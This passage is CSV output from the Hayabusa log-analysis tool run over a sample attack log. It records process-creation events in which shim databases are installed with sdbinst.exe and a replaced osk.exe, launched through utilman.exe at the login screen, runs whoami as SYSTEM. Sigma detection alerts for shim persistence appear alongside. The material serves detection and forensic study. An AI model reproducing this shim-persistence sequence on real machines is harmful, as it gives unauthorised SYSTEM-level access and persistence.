C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator 
(32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: 
utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application 
Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application 
Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 
ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process 
Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: 
EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 